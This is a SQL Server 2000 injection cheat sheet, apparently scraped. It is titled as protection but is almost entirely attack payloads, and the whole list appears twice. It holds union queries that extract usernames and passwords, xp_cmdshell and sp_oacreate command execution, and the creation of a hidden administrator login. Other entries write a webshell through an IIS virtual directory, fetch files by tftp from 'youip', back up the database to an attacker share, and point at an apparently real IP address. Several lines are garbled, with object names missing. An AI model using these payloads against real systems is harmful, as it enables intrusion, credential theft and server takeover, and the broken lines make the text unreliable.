SQL Server 2000 Injection Protection Collection (I)
SQL injection originated from 'or'1'='1
The most important table names:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
Some of the most important user names (present in a default SQL Server database)
public
dbo
guest (usually disabled, or has no permissions)
db_securityadmin
db_ddladmin
Some default extended stored procedures (worth auditing and restricting):
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia drive related
xp_dirtree directory
xp_enumdsn ODBC connection
xp_loginconfig server security mode information
xp_makecab Creates a compressed volume
xp_ntsec_enumdomains domain information
xp_terminate_process terminates a process, given a PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\
-c -Slocalhost -Usa -Pfoobar
' group by having 1=1-
' group by , , , having 1=1-
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
Construct statement: Query whether xp_cmdshell exists
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5245886 /add'
and 1=(select count(*) FROM where
xtype = 'X' AND name = 'xp_cmdshell')
;EXEC .sp_addextendedproc 'xp_cmdshell', ''
1=(%20select%20count(*)%20from%%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) determines whether the current login has sysadmin (sa) permission
and 0<>(select top 1 paths from newtable)--Breaking library method
and 1=(select name from where dbid=7) Get the database name (dbid 1 to 5 are system databases; only dbid 6 or above needs to be checked)
Create a virtual directory for the E: drive:
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -w "Default Web Site" -v "e","e:\"'
Access properties: (Write to a webshell)
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from where name>1 and dbid=6)
Submit dbid = 7,8,9.. to get more database names
and 0<>(select top 1 name from where xtype='U') Enumerate a table name; assume it is admin
and 0<>(select top 1 name from where xtype='U' and name not in ('Admin')) to get other tables.
and 0<>(select count(*) from where xtype='U' and name='admin'
and uid>(str(id))) The enumerated uid value is assumed to be 18779569 (uid=id)
and 0<>(select top 1 name from where id=18779569) Get a field of admin, assuming it is user_id
and 0<>(select top 1 name from where id=18779569 and name not in
('id',...)) to enumerate the other fields
and 0<(select user_id from where username>1)
You can then get the username, and the password in turn. Assume there are fields such as user_id, username, password, etc.
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(Union statements are popular everywhere; Access is easy to use.)
Special tip for database dumping: %5c='\', or modify / and \ to submit %5
and 0<>(select count(*) from where name>1 and dbid=6)
and 0<>(select top 1 name from where xtype='U') get the table name
and 0<>(select top 1 name from where xtype='U' and name not in('Address'))
and 0<>(select count(*) from where xtype='U' and name='admin' and uid>(str(id)))) Determine the id value
and 0<>(select top 1 name from where id=773577794) All fields
_blank>/?id=3400;create table [dbo].[swap] ([swappass][char](255));--
_blank>/?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)
_blank>http://61.131.96.39/?TianName=Policy and Regulations&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"%20/c%20ping%201.1.1";-
With the web path d:\xxxx obtained, next:
_blank>/?id=3400;use ku1;--
_blank>/?id=3400;create table cmd (str image);--
The traditional xp_cmdshell test sequence:
;exec master..xp_cmdshell 'dir'
;exec .sp_addlogin hax;--
;exec .sp_password null,hax,hax;--
;exec .sp_addsrvrolemember hax sysadmin;--
;exec .xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes / active:yes /add';--
;exec .xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http:///?classid=1; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net localgroup administrators swap/add'
_blank>http://localhost/?id=1'; exec master..xp_cmdshell 'tftp -i youip get '-
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='Your IP Your shared directory'
If restricted, it is OK.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec .sp_addlogin hax')
SQL injection originated from 'or'1'='1
The most important table names:
select * from sysobjects
sysobjects ncsysobjects
sysindexes tsysindexes
syscolumns
systypes
sysusers
sysdatabases
sysxlogins
sysprocesses
Some of the most important user names (present in a default SQL Server database)
public
dbo
guest (usually disabled, or has no permissions)
db_securityadmin
db_ddladmin
Some default extended stored procedures (worth auditing and restricting):
xp_regaddmultistring
xp_regdeletekey
xp_regdeletevalue
xp_regenumkeys
xp_regenumvalues
xp_regread
xp_regremovemultistring
xp_regwrite
xp_availablemedia drive related
xp_dirtree directory
xp_enumdsn ODBC connection
xp_loginconfig server security mode information
xp_makecab Creates a compressed volume
xp_ntsec_enumdomains domain information
xp_terminate_process terminates a process, given a PID
For example:
sp_addextendedproc 'xp_webserver', 'c:\temp\xp_foo.dll'
exec xp_webserver
sp_dropextendedproc 'xp_webserver'
bcp "select * FROM test..foo" queryout c:\inetpub\wwwroot\
-c -Slocalhost -Usa -Pfoobar
' group by having 1=1-
' group by , , , having 1=1-
'; insert into users values( 666, 'attacker', 'foobar', 0xffff )-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable'-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id')-
union select TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS where TABLE_NAME='logintable' where COLUMN_NAME NOT IN ('login_id','login_name')-
union select TOP 1 login_name FROM logintable-
union select TOP 1 password FROM logintable where login_name='Rahul'--
Construct statement: Query whether xp_cmdshell exists
' union select @@version,1,1,1--
and 1=(select @@VERSION)
and 'sa'=(select System_user)
' union select ret,1,1,1 from foo--
' union select min(username),1,1,1 from users where username > 'a'-
' union select min(username),1,1,1 from users where username > 'admin'-
' union select password,1,1,1 from users where username = 'admin'--
and user_name()='dbo'
and 0<>(select user_name()-
; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5245886 /add'
and 1=(select count(*) FROM where
xtype = 'X' AND name = 'xp_cmdshell')
;EXEC .sp_addextendedproc 'xp_cmdshell', ''
1=(%20select%20count(*)%20from%%20where%20xtype='x'%20and%20name='xp_cmdshell')
and 1=(select IS_SRVROLEMEMBER('sysadmin')) determines whether the current login has sysadmin (sa) permission
and 0<>(select top 1 paths from newtable)--Breaking library method
and 1=(select name from where dbid=7) Get the database name (dbid 1 to 5 are system databases; only dbid 6 or above needs to be checked)
Create a virtual directory for the E: drive:
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -w "Default Web Site" -v "e","e:\"'
Access properties: (Write to a webshell)
declare @o int exec sp_oacreate '', @o out exec sp_oamethod @o, 'run', NULL,' c:\inetpub\wwwroot\ -a w3svc/1/ROOT/e +browse'
and 0<>(select count(*) from where name>1 and dbid=6)
Submit dbid = 7,8,9.. to get more database names
and 0<>(select top 1 name from where xtype='U') Enumerate a table name; assume it is admin
and 0<>(select top 1 name from where xtype='U' and name not in ('Admin')) to get other tables.
and 0<>(select count(*) from where xtype='U' and name='admin'
and uid>(str(id))) The enumerated uid value is assumed to be 18779569 (uid=id)
and 0<>(select top 1 name from where id=18779569) Get a field of admin, assuming it is user_id
and 0<>(select top 1 name from where id=18779569 and name not in
('id',...)) to enumerate the other fields
and 0<(select user_id from where username>1)
You can then get the username, and the password in turn. Assume there are fields such as user_id, username, password, etc.
?id=-1 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,* from admin
?id=-1 union select 1,2,3,4,5,6,7,8,*,9,10,11,12,13 from admin
(Union statements are popular everywhere; Access is easy to use.)
Special tip for database dumping: %5c='\', or modify / and \ to submit %5
and 0<>(select count(*) from where name>1 and dbid=6)
and 0<>(select top 1 name from where xtype='U') get the table name
and 0<>(select top 1 name from where xtype='U' and name not in('Address'))
and 0<>(select count(*) from where xtype='U' and name='admin' and uid>(str(id)))) Determine the id value
and 0<>(select top 1 name from where id=773577794) All fields
_blank>/?id=3400;create table [dbo].[swap] ([swappass][char](255));--
_blank>/?id=3400 and (select top 1 swappass from swap)=1
;create TABLE newtable(id int IDENTITY(1,1),paths varchar(500)) Declare @test varchar(20) exec master..xp_regread @rootkey='HKEY_LOCAL_MACHINE', @key='SYSTEM\CurrentControlSet\Services\W3SVC\Parameters\Virtual Roots\', @value_name='/', values=@test OUTPUT insert into paths(path) values(@test)
_blank>http://61.131.96.39/?TianName=Policy and Regulations&InfoID={57C4165A-4206-4C0D-A8D2-E70666EE4E08};use%20master;declare%20@s%20%20int;exec%20sp_oacreate%20"",@s%20out;exec%20sp_oamethod%20@s,"run",NULL,"%20/c%20ping%201.1.1";-
With the web path d:\xxxx obtained, next:
_blank>/?id=3400;use ku1;--
_blank>/?id=3400;create table cmd (str image);--
The traditional xp_cmdshell test sequence:
;exec master..xp_cmdshell 'dir'
;exec .sp_addlogin hax;--
;exec .sp_password null,hax,hax;--
;exec .sp_addsrvrolemember hax sysadmin;--
;exec .xp_cmdshell 'net user hax 5258 /workstations:* /times:all /passwordchg:yes /passwordreq:yes / active:yes /add';--
;exec .xp_cmdshell 'net localgroup administrators hax /add';--
exec master..xp_servicecontrol 'start', 'schedule'
exec master..xp_servicecontrol 'start', 'server'
http:///?classid=1; DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net user swap 5258 /add'
;DECLARE @shell INT EXEC SP_OAcreate '',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\ /c net localgroup administrators swap/add'
_blank>http://localhost/?id=1'; exec master..xp_cmdshell 'tftp -i youip get '-
declare @a sysname set @a='xp_'+'cmdshell' exec @a 'dir c:\'
declare @a sysname set @a='xp'+'_cm'+'dshell' exec @a 'dir c:\'
;declare @a;set @a=db_name();backup database @a to disk='Your IP Your shared directory'
If restricted, it is OK.
select * from openrowset('sqloledb','server';'sa';'','select ''OK!'' exec .sp_addlogin hax')